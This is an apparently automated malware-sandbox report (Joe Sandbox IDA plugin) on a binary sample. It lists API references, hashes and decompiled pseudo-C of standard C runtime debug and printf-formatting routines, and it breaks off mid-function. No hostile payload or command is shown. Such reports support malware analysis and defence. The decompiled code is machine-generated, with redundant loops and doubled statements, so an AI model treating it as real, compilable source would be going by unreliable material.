    0x00b88bcd
    0x00b88bcf
    0x00b88bd4
    0x00b88b99
    0x00000000
    0x00b88b99
    0x00b88bd6
    0x00b88be6
    0x00000000
    0x00b88be6
    0x00b88bf7
    0x00b88c67
    0x00b88c67
    0x00b88c6e
    0x00000000
    0x00b88c6e
    0x00b88bf9
    0x00b88bff
    0x00b88c16
    0x00b88c1f
    0x00b88c3b
    0x00b88c44
    0x00b88c46
    0x00b88c4b
    0x00b88c10
    0x00000000
    0x00b88c10
    0x00b88c4d
    0x00b88c5d
    0x00000000
    0x00b88c5d
    0x00000000
    0x00b88c80
    0x00b88c80
    0x00b88c87
    0x00b88c94
    0x00b88c96
    0x00b88ca0
    0x00b88cb2
    0x00b88cb8
    0x00b88cbd
    0x00b88cbf
    0x00b88cc9
    0x00b88ccf
    0x00b88ccf
    0x00b88cbd
    0x00b88cdc
    0x00b88cef
    0x00b88d0e
    0x00b88d13
    0x00b88d29
    0x00b88d29
    0x00b88d3c
    0x00b88d45
    0x00b88d45
    0x00b88d4b
    0x00b88d58
    0x00b88d5a
    0x00b88d65
    0x00b88d98
    0x00b88d9d
    0x00b88d9d
    0x00b88db0
    0x00b88dbf
    0x00b88dcb
    0x00b88dcb
    0x00b88d58
    0x00b88cdc
    0x00b88dd1
    0x00b88dd1
    0x00b88dd8
    0x00b88df1
    0x00b88dfa
    0x00b88e02
    0x00b88e03
    0x00b88e04
    0x00b88e12
    0x00b88e12
    0x00b88b4e
    0x00b88722
    0x00b8872f
    0x00b88739
    0x00b88746
    0x00b8873b
    0x00b8873e
    0x00b8873e
    0x00b88750
    0x00b88757
    0x00b88762
    0x00b8876f
    0x00b8877a
    0x00b88780
    0x00b88785
    0x00000000

    APIs
    • InterlockedIncrement.KERNEL32(00D11D48), ref: 00B886E3
    • __invoke_watson_if_error.LIBCMTD ref: 00B88722
    • OutputDebugStringA.KERNEL32(Second Chance Assertion Failed: File ), ref: 00B8872F
    • OutputDebugStringA.KERNEL32(00B74A28), ref: 00B88757
    • OutputDebugStringA.KERNEL32(, Line ), ref: 00B88762
    • OutputDebugStringA.KERNEL32(?), ref: 00B8876F
    • OutputDebugStringA.KERNEL32(00B7122C), ref: 00B8877A
    • __invoke_watson_if_error.LIBCMTD ref: 00B88943
      • Part of subcall function 00B7DBD0: __invoke_watson.LIBCMTD ref: 00B7DBF1
    • _wcscat_s.LIBCMTD ref: 00B8893A
      • Part of subcall function 00B8FC60: __invalid_parameter.LIBCMTD ref: 00B8FCD2
    • _wcscat_s.LIBCMTD ref: 00B88972
      • Part of subcall function 00B8FC60: _memset.LIBCMT ref: 00B8FD3B
      • Part of subcall function 00B8FC60: __invalid_parameter.LIBCMTD ref: 00B8FD97
    • __invoke_watson_if_error.LIBCMTD ref: 00B8897B
    • __snwprintf_s.LIBCMTD ref: 00B889D4
      • Part of subcall function 00B8C5E0: __vsnprintf_s_l.LIBCMTD ref: 00B8C602
    • __invoke_watson_if_oneof.LIBCMTD ref: 00B88A0D
    • _wcscpy_s.LIBCMTD ref: 00B88A52
    • __invoke_watson_if_error.LIBCMTD ref: 00B88A5B
    • __cftoe.LIBCMTD ref: 00B88ACF
    • __invoke_watson_if_oneof.LIBCMTD ref: 00B88AFE
    • _wcscpy_s.LIBCMTD ref: 00B88B36
    • __invoke_watson_if_error.LIBCMTD ref: 00B88B3F
    • __itow_s.LIBCMTD ref: 00B88719
      • Part of subcall function 00B92350: _xtow_s@20.LIBCMTD ref: 00B9237B
    • __strftime_l.LIBCMTD ref: 00B887D9
    • __invoke_watson_if_oneof.LIBCMTD ref: 00B88812
    • _wcscpy_s.LIBCMTD ref: 00B88857
    • __invoke_watson_if_error.LIBCMTD ref: 00B88860
    • _wcscpy_s.LIBCMTD ref: 00B888B3
    • __invoke_watson_if_error.LIBCMTD ref: 00B888BC
    • __invoke_watson_if_error.LIBCMTD ref: 00B888F6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __invoke_watson_if_error$DebugOutputString$_wcscpy_s$__invoke_watson_if_oneof$__invalid_parameter_wcscat_s$IncrementInterlocked__cftoe__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnprintf_s_l_memset_xtow_s@20
    • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Pns$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$t8j$t9j$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
    • API String ID: 2835757914-1519116558
    • Opcode ID: c373087031f0403aa58504035d3e2afecd910c359d2dfeb7e93186156ca172a0
    • Instruction ID: 48aa84c09023060ad9349ebbe94cb85024333ed67edf6e40a8aa4e43efe705bc
    • Opcode Fuzzy Hash: c373087031f0403aa58504035d3e2afecd910c359d2dfeb7e93186156ca172a0
    • Instruction Fuzzy Hash: C40282B4940308ABDB20EF54DC46F9E77F4AB04746F4481D8F61D6A2E1DBB49A84CFA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00B805D0(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
    				intOrPtr _v0;
    				void* _v804;
    				intOrPtr _v808;
    				intOrPtr _v812;
    				intOrPtr _t6;
    				intOrPtr _t11;
    				long _t15;
    				intOrPtr _t19;
    				intOrPtr _t20;
    				intOrPtr _t21;
    				intOrPtr _t22;
    				intOrPtr _t23;
    				intOrPtr _t24;
    				intOrPtr _t25;
    				intOrPtr* _t29;
    				void* _t34;
    
    				_t25 = __esi;
    				_t24 = __edi;
    				_t22 = __edx;
    				_t20 = __ecx;
    				_t19 = __ebx;
    				_t6 = __eax;
    				_t34 = _t20 -  *0xd11338; // 0x8bc2db00
    				if(_t34 == 0) {
    					asm("repe ret");
    				}
    				 *0xd12c80 = _t6;
    				 *0xd12c7c = _t20;
    				 *0xd12c78 = _t22;
    				 *0xd12c74 = _t19;
    				 *0xd12c70 = _t25;
    				 *0xd12c6c = _t24;
    				 *0xd12c98 = ss;
    				 *0xd12c8c = cs;
    				 *0xd12c68 = ds;
    				 *0xd12c64 = es;
    				 *0xd12c60 = fs;
    				 *0xd12c5c = gs;
    				asm("pushfd");
    				_pop( *0xd12c90);
    				 *0xd12c84 =  *_t29;
    				 *0xd12c88 = _v0;
    				 *0xd12c94 =  &_a4;
    				 *0xd12bd0 = 0x10001;
    				_t11 =  *0xd12c88; // 0x0
    				 *0xd12b84 = _t11;
    				 *0xd12b78 = 0xc0000409;
    				 *0xd12b7c = 1;
    				_t21 =  *0xd11338; // 0x8bc2db00
    				_v812 = _t21;
    				_t23 =  *0xd1133c; // 0x743d24ff
    				_v808 = _t23;
    				 *0xd12bc8 = IsDebuggerPresent();
    				_push(1);
    				E00B8A350(_t12);
    				SetUnhandledExceptionFilter(0);
    				_t15 = UnhandledExceptionFilter(0xb75570);
    				if( *0xd12bc8 == 0) {
    					_push(1);
    					E00B8A350(_t15);
    				}
    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
    			}



















    0x00b805d0
    0x00b805d0
    0x00b805d0
    0x00b805d0
    0x00b805d0
    0x00b805d0
    0x00b805d0
    0x00b805d6
    0x00b805d8
    0x00b805d8
    0x00b8de5b
    0x00b8de60
    0x00b8de66
    0x00b8de6c
    0x00b8de72
    0x00b8de78
    0x00b8de7e
    0x00b8de85
    0x00b8de8c
    0x00b8de93
    0x00b8de9a
    0x00b8dea1
    0x00b8dea8
    0x00b8dea9
    0x00b8deb2
    0x00b8deba
    0x00b8dec2
    0x00b8decd
    0x00b8ded7
    0x00b8dedc
    0x00b8dee1
    0x00b8deeb
    0x00b8def5
    0x00b8defb
    0x00b8df01
    0x00b8df07
    0x00b8df13
    0x00b8df18
    0x00b8df1a
    0x00b8df24
    0x00b8df2f
    0x00b8df3c
    0x00b8df3e
    0x00b8df40
    0x00b8df45
    0x00b8df5d

    APIs
    • IsDebuggerPresent.KERNEL32 ref: 00B8DF0D
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B8DF24
    • UnhandledExceptionFilter.KERNEL32(00B75570), ref: 00B8DF2F
    • GetCurrentProcess.KERNEL32(C0000409), ref: 00B8DF4D
    • TerminateProcess.KERNEL32(00000000), ref: 00B8DF54
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
    • String ID:
    • API String ID: 2579439406-0
    • Opcode ID: fa411d58f942afee5249801f5c8e90af3fb1234f740887a8e898335de000eaed
    • Instruction ID: a7a1801c6f00867fdfe667695d4429702d1cc7a7034615f92661e58f016da210
    • Opcode Fuzzy Hash: fa411d58f942afee5249801f5c8e90af3fb1234f740887a8e898335de000eaed
    • Instruction Fuzzy Hash: CD21C0B8910304ABD710DF69E9856A97BA6FB08310F00C55AEA09C3374EF7255A6CFA5
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_000156F0), ref: 00B8576A
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: dc4ee09325c6e6b6f5036b6a08f6b00b94ff3af4ddf0b5fd3f8234d8c4e28cc7
    • Instruction ID: 8fc8dd1e663764555e719f40f10d5a8262d103c535cdd2947fd9129e2a7ebc9d
    • Opcode Fuzzy Hash: dc4ee09325c6e6b6f5036b6a08f6b00b94ff3af4ddf0b5fd3f8234d8c4e28cc7
    • Instruction Fuzzy Hash: 4BB012311542486782202BEAAC098127ACCC5C46303C10451F00D83060EC6194808971
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E00B956E9(signed int __edx) {
    				signed int _t496;
    				signed int _t518;
    				void* _t523;
    				signed int _t525;
    				void* _t545;
    				signed int _t563;
    				signed int _t580;
    				signed short _t581;
    				signed int _t584;
    				signed int _t587;
    				signed int _t588;
    				void* _t589;
    				signed int _t611;
    				signed int _t647;
    				signed int _t649;
    				signed int _t651;
    				signed int _t658;
    				signed int _t698;
    				void* _t699;
    				void* _t700;
    				signed int _t701;
    				void* _t703;
    				void* _t704;
    				signed int _t712;
    
    				L0:
    				while(1) {
    					L0:
    					_t647 = __edx;
    					 *(_t701 - 0x10) =  *(_t701 - 0x10) | 0x00000040;
    					 *(_t701 - 8) = 0xa;
    					L153:
    					while(1) {
    						L153:
    						while(1) {
    							L153:
    							while(1) {
    								L153:
    								if(( *(_t701 - 0x10) & 0x00008000) == 0) {
    									_t649 =  *(_t701 - 0x10) & 0x00001000;
    									if(_t649 == 0) {
    										if(( *(_t701 - 0x10) & 0x00000020) == 0) {
    											_t651 =  *(_t701 - 0x10) & 0x00000040;
    											if(_t651 == 0) {
    												_t496 = E00B93D50(_t701 + 0x14);
    												_t704 = _t703 + 4;
    												 *(_t701 - 0x2b8) = _t496;
    												 *(_t701 - 0x2b4) = 0;
    											} else {
    												_t580 = E00B93D50(_t701 + 0x14);
    												_t704 = _t703 + 4;
    												asm("cdq");
    												 *(_t701 - 0x2b8) = _t580;
    												 *(_t701 - 0x2b4) = _t651;
    											}
    										} else {
    											_t698 =  *(_t701 - 0x10) & 0x00000040;
    											if(_t698 == 0) {
    												_t581 = E00B93D50(_t701 + 0x14);
    												_t704 = _t703 + 4;
    												asm("cdq");
    												 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
    												 *(_t701 - 0x2b4) = _t698;
    											} else {
    												_t584 = E00B93D50(_t701 + 0x14);
    												_t704 = _t703 + 4;
    												asm("cdq");
    												 *(_t701 - 0x2b8) = _t584;
    												 *(_t701 - 0x2b4) = _t698;
    											}
    										}
    									} else {
    										_t587 = E00B93D70(_t701 + 0x14);
    										_t704 = _t703 + 4;
    										 *(_t701 - 0x2b8) = _t587;
    										 *(_t701 - 0x2b4) = _t649;
    									}
    								} else {
    									_t588 = E00B93D70(_t701 + 0x14);
    									_t704 = _t703 + 4;
    									 *(_t701 - 0x2b8) = _t588;
    									 *(_t701 - 0x2b4) = _t647;
    								}
    								if(( *(_t701 - 0x10) & 0x00000040) == 0) {
    									L170:
    									 *(_t701 - 0x2c0) =  *(_t701 - 0x2b8);
    									 *(_t701 - 0x2bc) =  *(_t701 - 0x2b4);
    									goto L171;
    								} else {
    									L166:
    									_t712 =  *(_t701 - 0x2b4);
    									if(_t712 > 0 || _t712 >= 0 &&  *(_t701 - 0x2b8) >= 0) {
    										goto L170;
    									} else {
    										L169:
    										asm("adc edx, 0x0");
    										 *(_t701 - 0x2c0) =  ~( *(_t701 - 0x2b8));
    										 *(_t701 - 0x2bc) =  ~( *(_t701 - 0x2b4));
    										 *(_t701 - 0x10) =  *(_t701 - 0x10) | 0x00000100;
    										L171:
    										if(( *(_t701 - 0x10) & 0x00008000) == 0 && ( *(_t701 - 0x10) & 0x00001000) == 0) {
    											 *(_t701 - 0x2bc) =  *(_t701 - 0x2bc) & 0x00000000;
    										}
    										if( *(_t701 - 0x30) >= 0) {
    											 *(_t701 - 0x10) =  *(_t701 - 0x10) & 0xfffffff7;
    											if( *(_t701 - 0x30) > 0x200) {
    												 *(_t701 - 0x30) = 0x200;
    											}
    										} else {
    											 *(_t701 - 0x30) = 1;
    										}
    										if(( *(_t701 - 0x2c0) |  *(_t701 - 0x2bc)) == 0) {
    											 *(_t701 - 0x1c) = 0;
    										}
    										 *((intOrPtr*)(_t701 - 4)) = _t701 - 0x49;
    										while(1) {
    											L181:
    											_t657 =  *(_t701 - 0x30) - 1;
    											 *(_t701 - 0x30) =  *(_t701 - 0x30) - 1;
    											if( *(_t701 - 0x30) <= 0 && ( *(_t701 - 0x2c0) |  *(_t701 - 0x2bc)) == 0) {
    												break;
    											}
    											L183:
    											asm("cdq");
    											_t658 =  *(_t701 - 0x2c0);
    											 *((intOrPtr*)(_t701 - 0x2ac)) = E00B855B0(_t658,  *(_t701 - 0x2bc),  *(_t701 - 8), _t657) + 0x30;
    											asm("cdq");
    											 *(_t701 - 0x2c0) = E00B85630( *(_t701 - 0x2c0),  *(_t701 - 0x2bc),  *(_t701 - 8), _t658);
    											 *(_t701 - 0x2bc) = _t658;
    											if( *((intOrPtr*)(_t701 - 0x2ac)) > 0x39) {
    												 *((intOrPtr*)(_t701 - 0x2ac)) =  *((intOrPtr*)(_t701 - 0x2ac)) +  *((intOrPtr*)(_t701 - 0x260));
    											}
    											 *((char*)( *((intOrPtr*)(_t701 - 4)))) =  *((intOrPtr*)(_t701 - 0x2ac));
    											 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) - 1;
    										}
    										L186:
    										 *((intOrPtr*)(_t701 - 0x24)) = _t701 - 0x49 -  *((intOrPtr*)(_t701 - 4));
    										 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) + 1;
    										if(( *(_t701 - 0x10) & 0x00000200) != 0 && ( *((intOrPtr*)(_t701 - 0x24)) == 0 ||  *((char*)( *((intOrPtr*)(_t701 - 4)))) != 0x30)) {
    											 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) - 1;
    											 *((char*)( *((intOrPtr*)(_t701 - 4)))) = 0x30;
    											 *((intOrPtr*)(_t701 - 0x24)) =  *((intOrPtr*)(_t701 - 0x24)) + 1;
    										}
    										L190:
    										while(1) {
    											L190:
    											while(1) {
    												L190:
    												while(1) {
    													L190:
    													while(1) {
    														L190:
    														while(1) {
    															L190:
    															while(1) {
    																L190:
    																while(1) {
    																	do {
    																		L190:
    																		if( *((intOrPtr*)(_t701 - 0x28)) != 0) {
    																			L216:
    																			if( *(_t701 - 0x20) != 0) {
    																				L00B7EB20( *(_t701 - 0x20), 2);
    																				_t704 = _t704 + 8;
    																				 *(_t701 - 0x20) = 0;
    																			}
    																			while(1) {
    																				L218:
    																				 *(_t701 - 0x251) =  *( *(_t701 + 0xc));
    																				_t665 =  *(_t701 - 0x251);
    																				 *(_t701 + 0xc) =  *(_t701 + 0xc) + 1;
    																				if( *(_t701 - 0x251) == 0 ||  *(_t701 - 0x24c) < 0) {
    																					break;
    																				} else {
    																					if( *(_t701 - 0x251) < 0x20 ||  *(_t701 - 0x251) > 0x78) {
    																						 *(_t701 - 0x310) = 0;
    																					} else {
    																						 *(_t701 - 0x310) =  *( *(_t701 - 0x251) +  &M00B77B58) & 0xf;
    																					}
    																				}
    																				L7:
    																				 *(_t701 - 0x250) =  *(_t701 - 0x310);
    																				_t525 =  *(_t701 - 0x250) * 9;
    																				_t611 =  *(_t701 - 0x25c);
    																				_t665 = ( *(_t525 + _t611 + 0xb77b78) & 0x000000ff) >> 4;
    																				 *(_t701 - 0x25c) = ( *(_t525 + _t611 + 0xb77b78) & 0x000000ff) >> 4;
    																				if( *(_t701 - 0x25c) != 8) {
    																					L16:
    																					 *(_t701 - 0x318) =  *(_t701 - 0x25c);
    																					if( *(_t701 - 0x318) > 7) {
    																						continue;
    																					}
    																					L17:
    																					switch( *((intOrPtr*)( *(_t701 - 0x318) * 4 +  &M00B95CD0))) {
    																						case 0:
    																							L18:
    																							 *(_t701 - 0xc) = 0;
    																							_t528 = E00B91090( *(_t701 - 0x251) & 0x000000ff, E00B7C680(_t701 - 0x40));
    																							_t707 = _t704 + 8;
    																							if(_t528 == 0) {
    																								L24:
    																								E00B95DE0( *(_t701 - 0x251) & 0x000000ff,  *(_t701 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    																								_t704 = _t707 + 0xc;
    																								goto L218;
    																							} else {
    																								E00B95DE0( *((intOrPtr*)(_t701 + 8)),  *(_t701 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
    																								_t707 = _t707 + 0xc;
    																								_t616 =  *( *(_t701 + 0xc));
    																								 *(_t701 - 0x251) =  *( *(_t701 + 0xc));
    																								_t665 =  *(_t701 + 0xc) + 1;
    																								 *(_t701 + 0xc) = _t665;
    																								asm("sbb eax, eax");
    																								 *(_t701 - 0x27c) =  ~( ~( *(_t701 - 0x251)));
    																								if(_t665 == 0) {
    																									_push(L"(ch != _T(\'\\0\'))");
    																									_push(0);
    																									_push(0x486);
    																									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																									_push(2);
    																									_t540 = L00B7D760();
    																									_t707 = _t707 + 0x14;
    																									if(_t540 == 1) {
    																										asm("int3");
    																									}
    																								}
    																								L22:
    																								if( *(_t701 - 0x27c) != 0) {
    																									goto L24;
    																								} else {
    																									 *((intOrPtr*)(L00B80C60(_t616))) = 0x16;
    																									E00B809F0(_t589, _t616, _t699, _t700, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
    																									 *(_t701 - 0x2f4) = 0xffffffff;
    																									E00B7C650(_t701 - 0x40);
    																									_t518 =  *(_t701 - 0x2f4);
    																									goto L229;
    																								}
    																							}
    																						case 1:
    																							L25:
    																							 *(__ebp - 0x2c) = 0;
    																							__edx =  *(__ebp - 0x2c);
    																							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
    																							__eax =  *(__ebp - 0x28);
    																							 *(__ebp - 0x18) =  *(__ebp - 0x28);
    																							__ecx =  *(__ebp - 0x18);
    																							 *(__ebp - 0x1c) = __ecx;
    																							 *(__ebp - 0x10) = 0;
    																							 *(__ebp - 0x30) = 0xffffffff;
    																							 *(__ebp - 0xc) = 0;
    																							goto L218;
    																						case 2:
    																							L26:
    																							__edx =  *((char*)(__ebp - 0x251));
    																							 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
    																							 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
    																							 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
    																							if( *(__ebp - 0x31c) > 0x10) {
    																								goto L33;
    																							}
    																							L27:
    																							__ecx =  *(__ebp - 0x31c);
    																							_t74 = __ecx + 0xb95d08; // 0x498d04
    																							__edx =  *_t74 & 0x000000ff;
    																							switch( *((intOrPtr*)(( *_t74 & 0x000000ff) * 4 +  &M00B95CF0))) {
    																								case 0:
    																									goto L30;
    																								case 1:
    																									goto L31;
    																								case 2:
    																									goto L29;
    																								case 3:
    																									goto L28;
    																								case 4:
    																									goto L32;
    																								case 5:
    																									goto L33;
    																							}
    																						case 3:
    																							L34:
    																							__edx =  *((char*)(__ebp - 0x251));
    																							if( *((char*)(__ebp - 0x251)) != 0x2a) {
    																								__eax =  *(__ebp - 0x18);
    																								__eax =  *(__ebp - 0x18) * 0xa;
    																								__ecx =  *((char*)(__ebp - 0x251));
    																								_t98 = __ecx - 0x30; // -48
    																								__edx = __eax + _t98;
    																								 *(__ebp - 0x18) = __eax + _t98;
    																							} else {
    																								__eax = __ebp + 0x14;
    																								 *(__ebp - 0x18) = E00B93D50(__ebp + 0x14);
    																								if( *(__ebp - 0x18) < 0) {
    																									__ecx =  *(__ebp - 0x10);
    																									__ecx =  *(__ebp - 0x10) | 0x00000004;
    																									 *(__ebp - 0x10) = __ecx;
    																									 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
    																									 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
    																								}
    																							}
    																							goto L218;
    																						case 4:
    																							L40:
    																							 *(__ebp - 0x30) = 0;
    																							goto L218;
    																						case 5:
    																							L41:
    																							__eax =  *((char*)(__ebp - 0x251));
    																							if( *((char*)(__ebp - 0x251)) != 0x2a) {
    																								 *(__ebp - 0x30) =  *(__ebp - 0x30) * 0xa;
    																								_t109 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
    																								__ecx =  *(__ebp - 0x30) * 0xa + _t109;
    																								 *(__ebp - 0x30) = __ecx;
    																							} else {
    																								__ecx = __ebp + 0x14;
    																								 *(__ebp - 0x30) = E00B93D50(__ebp + 0x14);
    																								if( *(__ebp - 0x30) < 0) {
    																									 *(__ebp - 0x30) = 0xffffffff;
    																								}
    																							}
    																							goto L218;
    																						case 6:
    																							L47:
    																							__edx =  *((char*)(__ebp - 0x251));
    																							 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
    																							 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
    																							 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
    																							if( *(__ebp - 0x320) > 0x2e) {
    																								L70:
    																								goto L218;
    																							}
    																							L48:
    																							__ecx =  *(__ebp - 0x320);
    																							_t117 = __ecx + 0xb95d30; // 0x553e9003
    																							__edx =  *_t117 & 0x000000ff;
    																							switch( *((intOrPtr*)(( *_t117 & 0x000000ff) * 4 +  &M00B95D1C))) {
    																								case 0:
    																									L53:
    																									__edx =  *(__ebp + 0xc);
    																									__eax =  *( *(__ebp + 0xc));
    																									if( *( *(__ebp + 0xc)) != 0x36) {
    																										L56:
    																										__edx =  *(__ebp + 0xc);
    																										__eax =  *( *(__ebp + 0xc));
    																										if( *( *(__ebp + 0xc)) != 0x33) {
    																											L59:
    																											__edx =  *(__ebp + 0xc);
    																											__eax =  *( *(__ebp + 0xc));
    																											if( *( *(__ebp + 0xc)) == 0x64) {
    																												L65:
    																												L67:
    																												goto L70;
    																											}
    																											L60:
    																											__ecx =  *(__ebp + 0xc);
    																											__edx =  *__ecx;
    																											if( *__ecx == 0x69) {
    																												goto L65;
    																											}
    																											L61:
    																											__eax =  *(__ebp + 0xc);
    																											__ecx =  *( *(__ebp + 0xc));
    																											if(__ecx == 0x6f) {
    																												goto L65;
    																											}
    																											L62:
    																											__edx =  *(__ebp + 0xc);
    																											__eax =  *( *(__ebp + 0xc));
    																											if( *( *(__ebp + 0xc)) == 0x75) {
    																												goto L65;
    																											}
    																											L63:
    																											__ecx =  *(__ebp + 0xc);
    																											__edx =  *__ecx;
    																											if( *__ecx == 0x78) {
    																												goto L65;
    																											}
    																											L64:
    																											__eax =  *(__ebp + 0xc);
    																											__ecx =  *( *(__ebp + 0xc));
    																											if(__ecx != 0x58) {
    																												L66:
    																												 *(__ebp - 0x25c) = 0;
    																												goto L18;
    																											}
    																											goto L65;
    																										}
    																										L57:
    																										__ecx =  *(__ebp + 0xc);
    																										__edx =  *((char*)(__ecx + 1));
    																										if( *((char*)(__ecx + 1)) != 0x32) {
    																											goto L59;
    																										}
    																										L58:
    																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																										__ecx =  *(__ebp - 0x10);
    																										__ecx =  *(__ebp - 0x10) & 0xffff7fff;
    																										 *(__ebp - 0x10) = __ecx;
    																										goto L67;
    																									}
    																									L54:
    																									__ecx =  *(__ebp + 0xc);
    																									__edx =  *((char*)(__ecx + 1));
    																									if( *((char*)(__ecx + 1)) != 0x34) {
    																										goto L56;
    																									}
    																									L55:
    																									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																									__ecx =  *(__ebp - 0x10);
    																									__ecx =  *(__ebp - 0x10) | 0x00008000;
    																									 *(__ebp - 0x10) = __ecx;
    																									goto L67;
    																								case 1:
    																									L68:
    																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																									goto L70;
    																								case 2:
    																									L49:
    																									__eax =  *(__ebp + 0xc);
    																									__ecx =  *( *(__ebp + 0xc));
    																									if(__ecx != 0x6c) {
    																										__ecx =  *(__ebp - 0x10);
    																										__ecx =  *(__ebp - 0x10) | 0x00000010;
    																										 *(__ebp - 0x10) = __ecx;
    																									} else {
    																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
    																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																									}
    																									goto L70;
    																								case 3:
    																									L69:
    																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
    																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
    																									goto L70;
    																								case 4:
    																									goto L70;
    																							}
    																						case 7:
    																							goto L71;
    																						case 8:
    																							L30:
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
    																							goto L33;
    																						case 9:
    																							L31:
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																							goto L33;
    																						case 0xa:
    																							L29:
    																							__ecx =  *(__ebp - 0x10);
    																							__ecx =  *(__ebp - 0x10) | 0x00000001;
    																							 *(__ebp - 0x10) = __ecx;
    																							goto L33;
    																						case 0xb:
    																							L28:
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																							goto L33;
    																						case 0xc:
    																							L32:
    																							__ecx =  *(__ebp - 0x10);
    																							__ecx =  *(__ebp - 0x10) | 0x00000008;
    																							 *(__ebp - 0x10) = __ecx;
    																							goto L33;
    																						case 0xd:
    																							L33:
    																							goto L218;
    																					}
    																				} else {
    																					if(0 == 0) {
    																						 *(_t701 - 0x314) = 0;
    																					} else {
    																						 *(_t701 - 0x314) = 1;
